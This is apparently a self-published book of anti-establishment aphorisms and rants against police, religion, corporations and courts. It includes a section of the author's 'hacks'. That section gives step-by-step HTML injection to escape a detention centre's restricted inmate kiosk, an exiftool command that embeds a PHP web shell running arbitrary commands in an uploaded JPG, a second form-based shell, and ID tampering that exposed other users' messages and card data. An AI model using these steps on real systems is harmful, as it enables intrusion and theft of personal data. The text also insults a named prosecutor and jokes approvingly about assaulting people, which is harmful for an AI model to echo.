people you don't trust. The general public.

If you did trust the general public, what

are your door alarms, tamper evident seals,
attorneys, fences, and car insurance for?

Trying to be unique is no longer unique

and has become a stereotype in and of itself.

The poor too often concern themselves
with the dialogue of the rich, diverting focus
from the exploitation.

Attack symbolism only logically at its

lack of substance, do not attack the physical
representations of their symbolism.

A purposeless existence as cheap labor

is often mentally scabbed over with "deity x, y,
or z has a plan for me".

American Dream(noun): complacency

and conformity over safety and security as you
clock in for corporations, give your wages back
to them, and give the state a cut.

If the system and state were so great,

the suicide rate wouldn't perpetually elevate.

If humans are the most advanced

species and there are enough resources on the
planet for all species to thrive, why are humans
the only ones unable to obtain a home just for

If someone is angry at injustice the state

just says 'mental health' and it prevents the
average citizen from coming to the aid of the
victim - thus creating the lone wolf.

Behind every corporate phrase and
slogan you can root out fear and deception
which are used to alter your behavior and
obtain your dollar.

We have to justify a existence we didn't

ask for with manual labor for things we don't
really need.

Politics(action noun): gossiping about the

rich that exploit you, and defending them.

Fear is the deadliest virus being spread

by religious and statist agents.

Business depends on not offending

people. That's ridiculous. Corporations have
constructed a make believe world.

What if you don't need Prozac you just

aren't meant to be cheap labor working a
pointless existence stocking shelves?

Society is built on fear, terrorism is law.

Never bite the hand that feeds you,

unless it also beats you citing feeding you, then
sever it.

Almost everyone in society plays dress

up in one or more of a wide array of socially
accepted costumes.

"I risked my life and got paid for
symbolism, global domination, and revenue. I
also helped keep my fellow countrymen
enslaved by corporations and the state so I
deserve honor and respect". You
don't. Veterans don't deserve respect. Your
ignorance deserves ridicule and sympathy. The
damages you have caused deserve

The number of people saying they don't

have a tolerance for bullshit is almost exactly
the same as the number of people causing

State Capture(action noun): what

corporations have done to society thanks to
voting consumers.

Why is a ridiculously expensive, small

piece of stone/metal a token of love, instead of
a year's food or a year's rent?

Your country didn't do anything for you.

it was all the wasted lives and cheap labor of
your fellow man.

I drink eight pounds of water per day.

The system is, in short and

oversimplified, an authoritarian, corporate
oligarchical plutocracy.

If you are not going to teach your
children to be self sufficient, then at the very
least teach them the way the system is out to
fuck them any way it can.

Many claim money doesn't matter but

also say america is the best because it's
wealthy. They also say we are the most free,
but we have the highest incarceration rate.

Martin Luther King Jr kept black people

enslaved with religious rhetoric.

Just because you know a threat is

coming and you prepare and don't back down
doesn't make you the aggressor or the guilty

99% of consumers don't know that a

Lexus is just a Toyota that costs more of their
federal debt credits so they can feel rich.

Push her wheelchair for her and when

she gets mad she'll tell people and police you
shoved her around.

The united states is a variation, a

derivative of Gestapo Germany and OVRA Italy.

If they can label you, they can dismiss

you along with anything you have to offer.

Mass production, mass marketing, mass

consumption, mass waste, mass media, mass
destruction. Human masses.

People are overly nice to black people to
prove they aren't racist, that's racist. People
put BLM in their business windows so they
don't get robbed. That's racist. Also

I wish I could share something hilarious

with my cat.

Attacking someone used to mean getting

punched on at the very least. Now it means just
saying things they don't like.

A real god wouldn't care if you said he

wasn't real. Real tired of your imaginary friend
needing to coerce, convince, or threaten me
through you.

Cattle Tipping (verb): go to any church

or political rally and push someone down.

If you want to offend the simpleminded

that have make believe problems, make fun of
their symbolism.

You can't take someone's life but you

can take their house and living situation. The
court system is a false pretense. 'Justice' is a
misnomer for state facilitated and profited
from, vengeance.

Even if you're a professional you're still a

slave in a field.

Americans are in a constant scrimmage
playing shirts vs skins while the league makes
a killing.

Stop trying to figure out how to pay rent

and start trying to figure out why.

In this socioeconomic system - poor

blacks and rednecks are laterally equal yet
influenced to be at war with each other instead
of those oppressing them for cheap labor.

Rednecks are the state's last resort

weapon...most are xenophobic behind
nationalism so will fight, and die, for free.

Stop fighting. Stop participating. Achieve

a mental state of calm awareness with no
emotion attached to it. If only I could practice
what I preach...

When all the names have been attacked

and discredited, who will you have think for you

It's a big planet, go over there. Don't you

have better things to do with your one
existence besides trying to interact with mine?

Corporations that force their employees

to hear the same constant repetitive music or
recordings are subjecting them to a form of

Those who were genuinely concerned
about the deaths of others would not scream
for police to race to the scene to enforce
corporate mask policies while they
contradictorily drive their murder machines
every day that contribute 3700+ deaths daily.

"Awww fucking spider webs in my face!"

Dude, you bulldozed his only grocery store.

Americans are quick to scream about

free speech until they have to hear something
they don't like.

Want to see society for what it really is?

Peel the labels off.

Dude, stop teaching your children that a

zombie was born to a virgin, walked on water,
and generated food from nothing. Those little
bastards turn into adults, a society full of
people who don't understand the basics of their
environment which leads to not caring
about/for it properly. After all, according to you
- you can rape and kill your whole life but if you
utter a couple magic words right before you die
- it all goes away.

The most ruthless gangs in relatively

ranking order:

law enforcement

ones on gangland

In a society of people that can't get

validation for their suffering, people don't have
the emotional capacity to care about your
suffering as much as you do.

Hierarchy(noun): people above you are

more important, people below you are looked
down upon.

If given Sophie's choice between my cat

and a random human, I see a guilt free future
of meow mix, litter box changes, and

Often my goal is to get the information I

need, not care how you righteously
misperceive the character I intentionally
display to you at that time.

Why not one meal all the time but you

can make it taste like any meal?

Without 911/999 calls and confidential

informants, the majority of police would have
no success or employment.

All celebrities, politicians, and managers

are sellouts.

The political construct is built on ad
hominem, symbolism, revenue, and image.
Remove those things and what do you have? A
bunch of fools standing around in suits
professing their loyalty to the 'little guy' they
exploit, so that he'll keep clocking in for them.

Why not instead live doing what you can

for others - leaving them alone unless they are
in genuine need. stop trying to force your views
on others with politicians and police.

Remove restaurants, royalty, religion,

renting rooms, groceries, golf, gasoline,
chemical consumption, choice in cars, politics,
pedophiles, and personally packaged products
to start surgically altering society's malformed

Read news articles from other countries.

not English written, but translated. Look at how
their states and medias manipulate them, too.

With hand over your heart, swear fealty

to a cloth with colors on it. Your imaginary
boundary line with emotional symbolism
attached to it, is better than their lines and
their symbols. Swear fealty by singing the
special song at the same time. the 'Horst
Wessel Lied'('Star Spangled Banner').

The system is a late stage capitalist,

socialist, authoritarian, totalitarian, corporate
oligarchical, paracosmic venn diagram.

Lose your earthly attachment(s). Enter
the void, empty. Become like water.

You know why old people get restless

without a job? Because they have been
conditioned their entire lives to be an
employee and have been taught that people
who sit at home are considered lazy though
they may possess a mental potential greater
than their physical labor is "worth".

People that can barely afford gas dollars

are idolizing people who spend $25,000+ on a
single piece of body jewelry.

As long as wealth is a thing, poverty will

be too.

No, the customer is not always right.

Punch them in the head for being petty.

Is our existence as purposeless, cheap

labor acceptable because we get packaged
food, internet, and plastic/metal things with
logos on them like XBoxes and cars?

Freedom in this society is freedom to

choose your own slavery. Freedom of religion is
freedom to choose your own mental slavery.
Hourly employment is freedom to choose your
own physical slavery. If you don't choose, then
you don't get to eat in this life or whatever
afterlife you 'chose' from the paracosm

Fear of guilt of having chose yourself
over your loved ones, keeps you working
wasting your mind and body for a corporate
dollar. If you think about it, clocking in makes
life harder for everyone, makes our existence a
plastic replica of a copy of a rich person's vision
of the world.

On television they liberate labor camps.

In society we clock in to them.

America(verb): to voluntarily relinquish

your freedom for a false sense of safety and
security after being conditioned to fear
everything in your environment.

The badge is not gestapo, the uniform is

not gestapo. The individual that binds his mind
and his sense of self to a flag, the badge,
and/or the uniform - is.

You can't not want to be ID'd by police

and stop human trafficking at the same time.

If you have thoughts that aren't statist,

keep them to yourself. The crusades,
inquisitions, witch hunts, jew hunts, and
totalitarian regimes removing threats(often by
just labeling them terrorists) are not make
believe or in distant history.

Do you keep participating in politics and
religion which keep you mentally submissive as
the cheap labor, or do you actually make
change in your environment? If you vote you
delegate the problems down. If you pray you
then pretend to delegate them up to an
imaginary friend - thinking that deity is clearing
them up in the background while you go to
work at McDonald's or the local factory. It's
control, labor, revenue.

What would happen, what type of life

would exist and flourish if all beings that
consumed other beings were terminated?

If you look at cities from the sky at night,

they are an infection, a scab on the planet.

State and federal law? What is the

system then with different rules for different
people in different parts of the nation and
different sentencing guidelines for the same
crimes, different wording for corporations and
the state to get their way at cost to us?
Humans evolve and adapt, how far
outside the realm of possibility is it that our
bodies are being conditioned to be cheap labor
and eat garbage? Would it not be better for all
of life if we adapted to synthetic sustenance?
If I have the knowledge they lack and
they act on their ignorance, is not then my
reaction the most culpable? Society is stupid
and often willfully ignorant. Is the 'willfully' part
justification for releasing anger on them?

Police are quick to beat on handcuffed
people but to this day I can't find a single
officer to take his badge off and square up for a
fair one.
Someone in law enforcement reading
this will volunteer for a fair one just to try and
discredit the previous stanza like it shuts down
the book series.
Voting at all is support for whatever
decisions the state makes.
The statists and the fearful are the
conformists, the ones that usher in the
totalitarian state. The ones that can't tell
what's fact and what's fiction in their own
environment...they will default to the state.
They are your enemy. Their fear will decide
their morality, not their paradigms or empathy
if they even have any.
Rage and a conscience are proven to
move mountains...can emotion and logic find a
proper balance?
me: "please stop that behavior"
them: *continues behavior
me: "please...stop...I'm starting to get
them: *continues behavior
me: "I'm getting ready to snap, stop"
them: "help, help, I'm being

You have almost the entire collection of
mankind's knowlegde at your fingertips.
Ignorance is a choice or laziness.
People get more angry at me using
profanity than they do the suffering of others
around them.
Dollar Tree asked me to buy school
supplies for military children. I said no. Here's
why: What's the military budget for then?
Killing other cultures' children while
abandoning the basic needs of our own? Guilt
the slaves into dying for money and oil, then
guilting the other slaves into providing that
family's basic needs? That way the state can
spend all your tax money on weapons.
I look at the general public when I am in
town and I am like - is this really the same
species that created wifi and airplanes from
things found outside?
Hunting is for cowards. Give the deer a
gun and some camo, some human
pheromones, opposable thumbs, and the ability
to predict through reason. Then it'll be halfway
You say society is stupid, yet you want
most of them to decide things for you and you
trust surveyed statistics. The lack of cognitive
function would be hilarious if it didn't have such
drastic societal/individual consequences.

Roaches and mosquitoes are not cute
and cuddly. just like most humans. Also, they
didn't ask to be here, either. Just because
something is small, you are afraid, or you don't
understand its purpose or existence doesn't
mean kill...humans for all their intelligence,
may still be the most primitive of all.
Being cheap labor to get your basic
needs met is still slavery whether you label it
hourly employment or adulthood.
Often my cat and I are just two beings in
a box making sounds at each other.
You don't need electricity to read a
fucking book.
Suffering is necessary, but never in
abundance. Suffering is growing, developing
with reluctance.
I am nowhere near considered an elite:

hardware hacker.
social engineer.
sentiment/data analyst.

In fact in one of those areas I'm remedial, one
way less than average, another just so-so. I do
sincerely believe however, that a jack of all
trades has greater potential for problem
resolution with a broad range of skills at a
lower level of mastery than a person
considered elite regarding one specific skill at
wizard status. Don't limit yourself as a human
because corporations, the state, religions,
and/or peers tell you to.
No gang member is open to evidence
against their gang. Republican, democrat,
christian, muslim, black, white, crip,
blood...logic and reason battle symbolism.
If you collect child support you don't get
to celebrate independence day(genocide day).
How are totalitarian states built? With
the ability to dehumanize others and invalidate
their suffering/anger, and the support of
viewers like you.
Many americans have a garbage diet of
fast food, fear, fraudulence, fear, faith, and
If RSA is broken, child predators can't
move their material but neither can
corporations or governments.
A human life is not worth more than the
life of a spider. An arachnid life is not worth
more than a human life. Only humans and their
fear, humans and their concept of value and
self would destroy to 'save'.

No politician is for us. Stop looking for a
savior, someone to worship and follow. Take
responsibility for your own existence.
I saw a gorgeous butterfly eating bird
Stop telling kids rainbows are magical
and start telling kids rainbows are reflection,
refraction, and dispersion of light in water
droplets resulting in a spectrum of light
appearing in the sky. That's just as awe
inducing for a young mind. Fairy tales make
dumb adults. Santa, jesus, the easter bunny...
it's almost like you want stupid humans walking
around having power over things and being
able to make choices that affect everyone. Life
is suffering but a make believe world is not the
There are real world solutions, then
there are emotionally placating symbolic
Who is 'they'? 99% of the time the state.
Every 3 seconds someone gets arrested. The
state is exploiting us, not protecting us.
Police, schutze(noun): tool/shield for the
You can't use someone's anger at what
you did, to play victim. Anger does not equal
guilt or take away from what you did.
I am a jain extremist. I will beat your ass
for hurting things.

I'm not a coward and that makes me the
minority and why I keep losing to strength in
numbers despite the evidence.
They accused me of being a monster
when I wasn't. maybe I should bring him out for
a round of double jeopardy?
Tell people you are afraid of someone
you aren't. Then just walking by them in the
hallway becomes a heroic act in the eyes of
If your best interest and freedom were
really what your religion and government were
about... why is your submission demanded
through force and/or fear?
To not believe in god is to know that it
falls on us to make the world a better place.
In this society, calling people on their
negative behavior is considered attacking
To misquote Fishburne - '...residential
self image, the mental projection of your
commercial self...'
Murder is illegal but slowly working
people to death at a factory is acceptable and
Classifying such complex architectures
as human beings into one word labels permits

Corporations beg for our dollars like
they're the ones living paycheck to paycheck.
Oh, that's right, they do. Yours.
Is social media what baudrillard would
consider pure simulacrum?
Free yourself of the narrative story of
your life. Memory often cripples, binding us to
the frozen past.
The more people with academic
credentials, the less academia itself
is worth.
The only way to generate more wealth
for corporations is to ensure high demand for
absurd and unnecessary things.
Inmates get food, a toilet, and a place to
sleep. The homeless get told "no restroom"
even though going outside is a sex case.
Only weak minds need a deity.
Hypocrites usually know, so I listen.
You wouldn't exist without incest.
Human(noun): parasite that destroys
everything in its environment while preaching
sanctity of life.
America is three corporations with a
military, not a country.
"We want equality!!!"
misspelled preferential treatment.

How many corporations would go out of
business if women learned to value
If I question my mental health by saying
my current state is the effect caused by past
events making me a product of
environment(we all are), and by vocalizing that
I don't function the same mentally or process
the same emotionally as this ridiculous society
of cheap labor, xenophobia, religion, sexual
depravity, gangs, and doctrine - then it further
cements society's view that I am the one who
functions incorrectly.
Those who bind their minds to a symbol
lose their sense of self.
For a society so morally against
oppression, you sure do worship the fuck out of
rich people.
Many fast food employees
are positive spirits. Imagine what they could do
for humanity if their jobs weren't shit and
Luxury and conservation
of resources are mutually exclusive.
'Go forth and multiply'. You did that. You
can stop.
Seems most amber alerts are just
parents trying to keep their kids away from this
brutal joke of a court system.

Felon does not mean criminal. It doesn't
not either.
Start mourning no names instead of the
rich and famous.
None of us chose to exist, why can't we
just be left the fuck alone?
The poor dying for the tiffs, tariffs, and
tantrums of the rich. So, pretty much business
as usual for the planet, then...
You can protest all you want but the
moment you voted, you gave your government
authority to act on your behalf.
Who exactly is at war in the middle east?
I know I am not yet I have to live accordingly.
If people are not permitted to experience
their full existence how could they produce
anything necessary for/from it, without any of
the data or materials?
If you stopped trying to 'be' things, you
wouldn't require the acceptance of others.

We need police, but we need them to
apprehend people that rape kids not enforce
city ordnance 3.13 section (e) subparagraph (a)
that CLEARLY states you owe the state money
for parking your already taxed to the ass
vehicle in front of THEIR buildings($.25 for
fifteen minutes now or $273 for all the time you
need that day, in the mail later) and state
statute 134.2 that says if a 'peace' officer sees
a guy smoking weed and he's having a bad day
on the beat, he can not only beat his ass and
take it from him, but he can take his freedom
for it, too. crimes are no longer crimes. crimes
are revenue generation, arbitrary wording of
rich politicians and the police have become
palace guards. If a societal path diversion was
to happen it would have already. Industry and
revenue are killing us and the police enforce it.
I can't predict the future but...I do read a lot of
historical books and I pay attention to my
environments long term. If you don't stop
buying shit and the police don't start making a
stand by only enforcing genuine laws that have
victims and hurt people(rape, murder, home
invasions, etc) then I think as a society - we're
done. Mind you, there are those who do
extremely well in this system and/or are afraid
so they will not have that and at your expense.

Regarding a human's mental and
progressive evolution, base primitive urges and
emotions cloud judgement and shift focus. If
humans focused on introspection, cleaning up
our environment, and finding new sustainable
forms of energy instead of bonding with even
more people and creating exponentially more
children to exist in a world that is rapidly
breaking down because people vote and pray
for resolution instead of acting, we might
actually get somewhere. Get your
codependency on though, bro...
People that have received a beatdown
from me have done one or more of the
abused animals
abused kids
fucked with the weak
fucked with family
falsely accused
hated someone for their skin
licked the boot of a gestapo
talked shit on the internet

I was walking by a store. The owner

came out and threw trash on the sidewalk. I
picked it up and I took it back in. I pretended
like I was looking for something to buy and
then just set it on the floor and left.

America does aggressive shit, then plays
victim when others react. It's like the united
states learned from my son's mother's
Through unjust civil and criminal courts
the state has created an army of victims.
Sometimes I miss relationships but then I
remember that humans say words that are
often wrapped in feelings and deceptions and
petty wants.
If one person's income is dependent on
the other person spending their income, why
even do it in the first place?
Look back on a debate you had last year.
have you thought about how you felt during it,
since then? It doesn't matter.
We each have one existence. It is stolen
by corporations, religion, and politics. Not
Even our impoverished are fat and
If police stopped responding to petty
calls, pretend victims would be much less
inclined to start shit.
I will say the aesops fable about jesus
saying sell all your shit and go be free or
whatever was on point.
Choosing a religion or politician is you
getting to pick the color of your shackles.

Stargate SG-1 teaches a more sound
moral code than the bible and quran do.
If people focused more on what they
needed to do instead of how they looked doing
If you need someone to rally behind, you
will always be at war with each other. Someone
will always want a different leader.
Trusting nothing your gvernment tells
you is just as lazy as trusting everything your
government tells you.
If everyone stops taking plea deals
because it's 'easier', it will cause a buffer
overflow and the courts of injustice shut down.
Every attorney is, by title, an officer of
the court.
Police work for the district attorney's
office. Period. That is where their loyalties will
always lie.
Any officer who has ever written a
speeding ticket is guilty of extortion.
You are an adult, you can disappear into
the forest right this minute if you chose to.
How can I enjoy a bite of fresh bread
knowing at every moment there are people
that have zero things to eat?

Assume there is something greater than
ourselves for this stanza. The body is pain.
Having a body is pain. Pain and discomfort.
Then there's boredom. Why is life suffer and
time? Maybe we have a body because it is to
get us accustomed to boredom in the nebulae
and to understand what pain is. That is
irrational for two reasons.
1) Animals. they suffer as well. I don't deserve
anything more or less than they do. Unless
Bostrom is correct on some level.
2) I keep trying to find a purpose for not just
our, but MY existence. Not everyone's life is
time and suffer. Many have a thrilling, luxurious
existence from birth to death.
While you're busy hating one politician,
the ones you love are fucking you in the ass.
Me being a part of society's problem, I
change my own behavior instead of voting for
others to change theirs.
In a society that throws away everything
after tiring of it quickly, why would they treat
each other any different?
If you vote, you approve of whatever
decisions your government makes globally.
Politics only works when the slaves
identify with their masters.
IIf your environment is stressful, anxious, are more likely to see illusory
patterns in life.

If you need a religion or state to be
moral, then you cannot handle free will.
Humans often allow other humans' shit
behavior because they want to have sex with
Of course anyone who challenges this
system of profiteering from suffering needs to
seek mental health treatment.
My son's mother is one of the only
animals in history and existence that depend
on their offspring for survival.
Media & state employees allow injustice
daily. Why? They value their job over what's
morally sound. It's the late 1930's again.
Single cell organism = bible false.
The united states trains children for
prison early. If they behave in solitary they can
eat in the cafeteria with the other inmates.
Controlled movements, uniforms, curriculum,
If you have never seen Schindler's List,
you are probably going to see the live rendition
in your lifetime.
Be afraid and give him money every
Sunday but he only wants to protect you? Are
you sure your chosen deity is not with the

The state always uses puppies and
children to curry public favor. In chicago a dog
swears, in human style, on a book of human
totalitarian laws that make us fight each other,
to uphold those laws. The dog is sworn into
Ohio passed a bill allowing students'
answers to be wrong due to religion.
In our society, a bully can be beating up
a kid but if you separate them, the bully's mom
can press assault charges on you.
Things americans pretend to know
everything about? What happens after you die,
themselves, and what is best for you.
Public schools call greek gods
mythology. A zombie born to a virgin, walking
on water, and generating food from nothing
Voting is trying to fix a garbage engine
by changing the pain job every four years.
No society can achieve a state of peace
and enlightenment through fear and forced
The adventures, heroes, magic, love,
battles, creatures, and worlds in movies and
games - does it not make our own lives seem
District attorneys are the epitomes of
feigned morality. The state has the only exact
definition of a relative concept.

Ghost hunters are allowed and pedophile
hunters are not. Ghosts are make believe,
pedophiles are not. We can't hunt real
In 1912 White Star Line paid the Titantic
employees only up until the moment it sank.
Stop making houses out of wood and
start using all that plastic and those tires we
can't find anywhere to 'throw away'.
Prayer is a symptom of schizophrenia.
We think it's awesome when the
handicapped get hourly employment but that
just means the handicapped are being used as
slaves too.
Tipping is for employer benefit at
customer and employee expense.
I no longer have kernel taint.
"What is the difference between
ignorance and apathy?" "Don't know, don't
Sometimes I wish jesus and those guys
were real then I'd at least feel there was a
purpose for our suffering.
Name one politician or lawmaker that
isn't wealthy.
In high school was your class president
able to stop the excess homework, bullies, etc
or did he need those, so you'd vote for him?

At least the slaves have their trinkets,
their bonds with their fellow man are
America uses the worst case scenario to
justify banning anything. except for cars,
religion, fast food. it is profit vs acceptable loss.
you voted for the criminal justice system
to make a criminal out of anyone. don't act
surprised when your number's up.
The cutoff age for whining is don't let it
Death Row Records is owned by Hasbro.
There is water on Mars.
No matter what religion you follow, fear
is your god.
Knowledge is for sale, what is the cost?
All of our lives in debt to become a jack of no
trades, apprentice of one.
Which is more important with our one
existence - developing towards one's full
potential or becoming a conforming member of
this cheap labor society?
If you don't like semi trucks in traffic,
stop buying things.
Just by sitting and doing zero things, that
makes you morally better than half the
population by default.
Please stop confusing misanthropy with

The pharmaceutical, medical, and
psychiatric industries are best of friends.
Revenue and prestige perpetuating the
corporate laboratory of an existence that is
your 'life'.

time and money spent on image

renders us nonfunctional

This section is some of my hacks:

Hack no. 1: Grady County Federal

Detention Center:

The inmate kiosks use a restricted

ThinBuntu operating system. The system
was setup so that when the kiosk loaded, it
booted directly into a Firefox add-on.
Inmates could not access any part of
Firefox or the Desktop. I was being held in
Grady because they didn't flag that the
Ersatz OKC bomber was also there. A 5 day
delay which is strange but maybe not. We
are paperwork done by humans just doing
their job. Using HTML injection I was able to
bypass the Firefox restrictions and access
the desktop and the root folder.

1. After logging in as yourself[inmate] click

on Law Library.

2. In the Fast Case search box turn the

query to a link that refers to the SSL
enabled site(the local domain *.sjm) like so:
<a href="https://www.inmate-
interface.sjm">random text</a>

3. Click the link that shows up in the


4. A button that says "Get me out of here"

appears. Click it.

5. A fresh Firefox page loads. At the

bottom, click Extensions.

6. Disable the add-on that limits the

menu/tool bars.

7. Click Restart Firefox.

8. Under customize, there is an 'Open file...'

button. This allows you to open any Firefox
readable file in the root directory.

Hack no. 2:

I was looking for a cheap house on a

cheap acre of land. They have them.
Cheap. Then I realized, they are just
investments for some. I remind you there
are more empty homes than homeless.
These banks and real estate profiteers hold
basic needs hostage for manual labor. Your
money is only as real as the next person
thinks it is. Foreclosed homes of the poor in
southern states flood the listing sites. This
is not going where you think it is. I kept
getting emails well after I unsubscribed,
turned off notifications, etc. It is fixed now,
but the site admin kept saying it was a
GoDaddy issue. Still kept getting daily
emails. I could block it, but when things in

the cyberworld don't behave as expected I
pay attention. Finally I do some exploration
and because of agreement I can't disclose
the steps, but I found the admin db
credentials. I got a thanks on the about
page. The site admin fixed all of the issues
and quickly. All sites have some sort of
vulnerability. Having one shouldn't hurt
reputation what should is if they do nothing
to patch it. Paul handled things
exceptionally well and few site admins
have responded as promptly or efficiently.

Hack no. 3: A foreign medical

provider and several universities around
the globe:

I found the hospital administrator's
credentials. I notified them in their
language. They keep changing the
credentials. That doesn't fix it. Many have
resolved the issue entirely.

Hack no. 4: SolarEdge:

I found a LFI/Directory Traversal

vulnerability which allowed me view
their .htaccess file. Separately, I submitted
another report about exposed API keys. I
couldn't find out if the API keys were known
to be public. It was in an env-config file. I
find out that that file and those type of API
keys are known to be public after speaking
with someone. Going on two weeks later I
can't access the .htaccess file anymore.

Right after I cc: the CEO in an email, they
respond with an apology for the delay and
then a day or two later they say, "This is a
duplicate or we would pay you a bounty.
Someone reported this already. We will
give you these X amount of Hall of Fame
points." If I didn't have the screen
recordings it would be debatable. They
have an obscure bounty program. This
vulnerability has been there for a long
time. Yes, there is a small percentage that
someone else hacked them, in all that
time, right before I did. Or, maybe they
never check their bounty submissions until
I submitted these reports. The latter far
less likely. There's something else though.
Another accompanying email which was in
response to the public Google API keys,
they said the same exact thing. This was
NOT a valid vulnerability yet they
again said, "This is a duplicate or we
would pay you a bounty. Someone reported
this already. We will give you these X
amount of Hall of Fame points." These
corporations are getting red team work
done for pats on the back. No one likes to
do corporate work for pats on the back. Or
do they? Some people want the name.
Some people want the money. Me? I want
humans to stop exploiting life.

Today is 02/23/2023. Yesterday I

found another .htaccess file exposed with
double URL encoding. I submitted it. We'll
see if they say the same thing to avoid
paying a bounty. I don't care about the
money, just don't be dishonest in your Bug
Bounty program and then expect
responsible disclosure.

An .htaccess file is all of the rewrite

rules for the files they don't want accessed.
An .htaccess file is a regex boundary map
for input. It tells you what is not allowed
and what is. If your text matches a certain
condition, it rewrites it and redirects. To
bypass, enter your text without matching
that condition.

I am not an elite hacker, I just have a

decent understanding of systems. Social
and network.

Hack no. 5: Undisclosed e-
commerce/social media site:

<Webshell in banner image upload>:

The site only allows *.jpg files. First,

using exiftool I embedded a one line PHP
script into one:

exiftool -Comment="<?php

if(isset($_REQUEST['cmd'])){ echo
'<pre>'; $cmd = ($_REQUEST['cmd']);
system($cmd); echo '</pre>'; die; }?
>" originalphoto.jpg -o webshell.php

Then, I uploaded and visited the

image(webshell.php?cmd=). The command
output is displayed.

<Webshell in private conversation>:

I sent this as a message:

<form method="GET" name="<?php echo
basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd"
autofocus id="cmd" size="20">
<input type="SUBMIT"


The sent message returned a


<Accessing other members

messages and personal data>:

The function that retrieves user

messages starts with an OPTIONS request
of 0 bytes. It is immediately followed by a
GET request to retrieve how many unread
messages I have. Altering the GET request,
the response is a JSON object showing
how many messages, but no content:

So then I started on the OPTIONS
request and by again inserting random
user/conversation ID values, the JSON
response included the message content
this time:

Next I started changing the
host/URL values on the GET request and
by doing the same thing, with random
user/conversation IDs, the JSON response
included the credit card information:

This section is about the tyranny
of the current court system and its

Too many judgments in court are

arbitrary and based on things that are not
guilt or innocence and usually biased
towards the state. Harsher sentences or
lighter sentences depending on what
smaller, nationalist boundary you reside in,
what color your skin is, how much revenue
you generate, assets owned, or even how
long it had been since the presiding,
gowned ass authority stuffed
something down their nationalist

America's construct is putrid, the

rank scent of xenophobia, nationalism,
dehumanization, exploitation, fear,
manifest destiny, and the inertia fallacy. On
the face though, its citizens scream justice,
peace, and freedom. Garbage. Misnomers.
Transparent at that. Peace is a lucrative
misnomer for "prerequisite for war". Justice
is a lucrative misnomer for "state
sanctioned vengeance". Freedom is
lucrative misnomer for "a lifetime of factory

labor with snacks and an XBox". The
allegory of the caves. Tell humans born into
the cave they are free and they will believe
this is what freedom is. It is all they know.
That is another reason the American
construct is so disgusting. Oligarchs,
plutocrats, and other politicians/CEOs rely
on the general public not understanding
their environment. Rational people don’t do
Democrat or Republican things. Rational
people do not identify as anything let alone
a geographical boundary or a gender that
doesn’t exist. Irrational people are
generally easily controllable and the few
that aren't, get forced by police. Pronoun
people are a problem. Not because they
are gay but because they are trying to
force a pretend construct around it that I
also am required to participate in. Yet
another example of irrational garbage
filling up a courtroom. Imagine not just
existing with your loved one, but
demanding the state intervene and license
you to do so. People with valid grievance
that get no recourse/justice from the
tyrant's castles move to social media to
present their cases to the public. They are
getting silenced and for arbitrary things. I,
just as everyone else being silenced, have
had mental movies of destroying Musk,
Zuckerberg, Shou Zi Chew, Steve Huffman,
etc but as with my maxim on politicians:

Targeting specific tyrants and arrest &
replace solve nothing, it only perpetuates
the tyranny. My videos on TikTok of police
brutality that catch momentum all of a
sudden get removed for "hateful ideology"
or "dangerous acts". Yeah, being jumped
by police for not using a sidewalk on a
street with no sidewalk is really "hateful
ideology" or "dangerous acts". The same
video was banned on Facebook for "nudity
& sexual activity". I mean, I was rectum-
punched by Bangor boots, but we all had
clothes on:

Challenging police during my own
traffic stop about their 'extortion as
protection' racket to fund themselves as
they enforce it with violence & call it
'safety' is not 'hateful ideology'. I am
challenging the hateful ideology. If I posted
a video telling police to "go confiscate
those dangerous wages from the lower
classes!" I doubt it would get a ban.
Corporations and the state tag team us so
that they maintain a mother/father type of
dominion over us:

Prosecutors pretend to champion

victims. The general public, only concerned
for their snacks and XBoxes, begs the rich
to take away anyone that challenges their
precious comforts, excess, waste, and toys.
Prosecutors consider themselves heroes,

but who are gods with no one to worship
them? If ‘crime’ stopped, they would be like
us, regular nobodies. Their employment
wouldn’t exist. It therefore behooves
prosecutors to never let crime stop. The
system they enforce CREATES 'criminals'.
The amount of revenue generated by the
‘criminal’ ‘justice’ system eclipses the GDP
of 133 countries. Most other countries are
apathetically aware of America’s
police/court brutality & abuse problem.
Google scholar has numerous articles
about it. Every person that wears a state
uniform/suit does negative labor while they
prey on those doing the cheap, actual,
manual labor. “I have a state title!” or “I
am me!” so I do not have to do the toilets
or factory production or customer service.
“That’s for the addicts, the thieves,
prostitutes, and other victims of the system
I enforce!” Prosecutors are disgusting
creatures that pretend they are clean,
socially elevated, and humans without sick
habits. Every prosecutor that has destroyed
innocent lives should rot in a box for life.
This is almost all of them because they
wouldn't maintain employment for long if
they didn't enforce system garbage. The
depraved humans don't justify police doing
what they do to everyone else, especially
when many of the depraved humans are
police. Nuremberg 2.0 is en route. The

sprawling criminal code scribbled by rich
suits trying to maintain their obscene
authority is making a 'criminal' of almost
everyone. Eventually, society will be
divided into two groups. Nationalist, police
state loving, fearful, politician and system
worshiping degenerates versus the ones
being trampled by them. A small number of
people with an entire military versus a
large number of people forced to do the
manual labor for them while being
dehumanized by them. Make sure you are
on the existentially moral side. If you beg
rich masters while sucking their bald eagle
dick, you're probably not a shining example
of "intellectual being".

The prosecutor in my case for

resisting the Blue Stripe Bandits extorting
other people in traffic, Frayla Tarpinian, is a
pickleback uptop lesbian with a black
family. Why are lesbian and black
mentioned? Her enforcers are the people
that have done the most to trample gay &
black rights yet she pretends to champion
for gay & black people. Severe nationalist
cognitive dissonance:

1. Injustice Remedy & Time.

By the time an injustice by state

officials is ‘remedied’ by another state
official(usually with hush money from the
taxed wages of others having injustices
committed against them by state officials)
– countless other injustices by state
officials are committed across the country.
System-wide tyranny with no recourse. The
amendments and appeal success rate show
that to this day the system is wrong and
can’t get it correct. The state would rather
get some innocent people than let a single
guilty person go, however – it does both
and more so than were they willing to let
some guilty go instead of getting a single
innocent. Law of inertia – too many state
suits are comfortable with their luxuries
and authority so why would they restart the
system removing bloatware and injustices?
The recidivism and crime rates show that
incarceration is not successful. Legislation
and tyranny do not solve social issues.
They create them while profiting from them
as their ranchhand police keep the
livestock submissive and complacent,
generating revenue for master. Most
situations police claim to protect people
from - at random let's just say a stand-off
bank robbery - wouldn't have occurred

were they not enforcing such a depraved
system for their rich, leash-holding, suit ass
masters at our existential expense. They
call themselves 'heroes' for weak attempts
at mitigating fires they started.

2. Etymology, Changing Definitions, and


Guilty and Innocent. Most ‘crimes’ in

this society are not existentially valid. In
other words, were we not forced to
compete for resource crumbs by expending
our existence as cheap labor for the suits,
crime would not be what it is. Much social
strife would also be alleviated. You
